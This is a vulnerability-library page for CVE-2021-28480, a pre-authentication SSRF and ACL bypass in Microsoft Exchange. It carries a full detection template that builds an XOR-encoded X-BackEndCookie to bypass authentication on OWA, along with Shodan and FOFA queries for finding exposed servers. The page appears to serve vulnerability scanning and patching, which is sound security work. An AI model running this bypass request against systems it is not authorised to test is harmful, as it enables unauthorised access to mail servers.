/Vulnerability Library

Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)

CVE-2021-28480
Verified

Description

Microsoft Exchange Server contains a remote code execution caused by improper input validation in the server component, letting remote attackers execute arbitrary code, exploit requires network access to the server.

Severity

Critical

CVSS Score

9.8

Exploit Probability

87%

Affected Product

exchange_server

Published Date

January 20, 2026

Template Author

daffainfo

CVE-2021-28480.yaml
id: CVE-2021-28480

info:
  name: Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)
  author: daffainfo
  severity: critical
  description: |
    Microsoft Exchange Server contains a remote code execution caused by improper input validation in the server component, letting remote attackers execute arbitrary code, exploit requires network access to the server.
  impact: |
    Attackers can execute arbitrary code remotely, potentially leading to full system compromise or data breach
  remediation: |
    Apply the latest security patches and updates provided by Microsoft for Exchange Server
  reference:
    - https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482
    - https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdf
    - https://www.youtube.com/watch?v=vn4niT9XEIM
    - https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28480
    - https://nvd.nist.gov/vuln/detail/cve-2021-28480
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-28480
    cwe-id: D-CWE-noinfo
    epss-score: 0.87144
    epss-percentile: 0.99458
    cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,ssrf,rce,exchange,microsoft

variables:
  email: '{{rand_base(5)}}@{{rand_base(5)}}.com'
  epoch: '{{unix_time()}}'
  date: '{{date_time("%Y-%M-%DT%H:%m:%s")}}'

flow: |
  http(1)
  let servername = template.servername;
  let epoch = template.epoch;
  let date = template.date;
  let str = "Server~x]@" + servername.toLowerCase() + ":444/owa/?a.a#~" + epoch + "~" + date;
  let result = "";

  for (let i = 0; i < str.length; i++) {
    let xorChar = str.charCodeAt(i) ^ 0xff;
    result += xorChar.toString(16).padStart(2, "0");
  }

  set("rawXor", result);
  http(2)

http:
  - raw:
      - |
        GET /owa/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(to_lower(header), "x-feserver")'
        condition: and
        internal: true

    extractors:
      - type: kval
        name: servername
        kval:
          - x_feserver
        internal: true

  - raw:
      - |
        GET /owa/calendar/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: X-BackEndCookie={{email}}={{base64(hex_decode(rawXor))}}
        X-AnchorMailbox: {{email}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NT+AUTHORITY"
          - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException"
        condition: and

      - type: status
        status:
          - 302
# digest: 490a00463044022007403e8223be9544fd39a78aab95d13081ec3d25abed780c499b59daac7b85480220786712957ce7c15c92d35463cc0b2e54dd94a92e36a2b598ee4a0249e5efc020:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2021-28480
CWE ID:
d-cwe-noinfo

References

https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdfhttps://www.youtube.com/watch?v=vn4niT9XEIMhttps://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28480https://nvd.nist.gov/vuln/detail/cve-2021-28480

Remediation Steps

Apply the latest security patches and updates provided by Microsoft for Exchange Server